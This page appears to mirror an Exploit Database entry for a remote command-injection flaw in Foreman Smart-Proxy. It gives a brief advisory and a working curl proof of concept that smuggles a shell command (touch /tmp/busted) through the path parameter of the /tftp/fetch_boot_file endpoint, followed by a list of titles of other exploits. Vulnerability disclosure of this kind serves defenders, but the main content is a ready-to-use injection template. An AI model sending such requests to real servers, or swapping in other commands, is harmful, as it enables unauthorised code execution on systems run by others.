Foreman Smart-Proxy – Remote Command Injection

Exploit Database
18 阅读

作者： Lukas Zapletal

日期： 2014-06-05
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/39222/

source: https://www.securityfocus.com/bid/68117/info

Foreman is prone to a remote command-injection vulnerability.

Successful exploits will result in the execution of arbitrary commands with the privileges of the user running foreman-proxy. 

curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://www.example.com:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B'

last Exploits
Foreman Smart-Proxy – Remote Command Injection的更多信息

IBM Lotus Notes Traveler 8.5.1.x – Multiple Input Validation Vulnerabilities：
μTorrent (uTorrent) Classic/Web – JSON-RPC Remote Code Execution / Information Disclosure：
ZScada Modbus Buffer 2.0 – Stack Buffer Overflow (Metasploit)：
Oracle JRE – java.net.URLConnection class Same-of-Origin ‘SOP’ Policy Bypass：
Freefloat FTP Server – ‘MKD’ Remote Buffer Overflow (Metasploit)：
Ayukov NFTP FTP Client 2.0 – Remote Buffer Overflow (Metasploit)：
Nagios XI – ‘login.php’ Multiple Cross-Site Scripting Vulnerabilities：
Barracuda Spam & Virus Firewall 5.1.3.007 – Remote Command Execution (Metasploit)：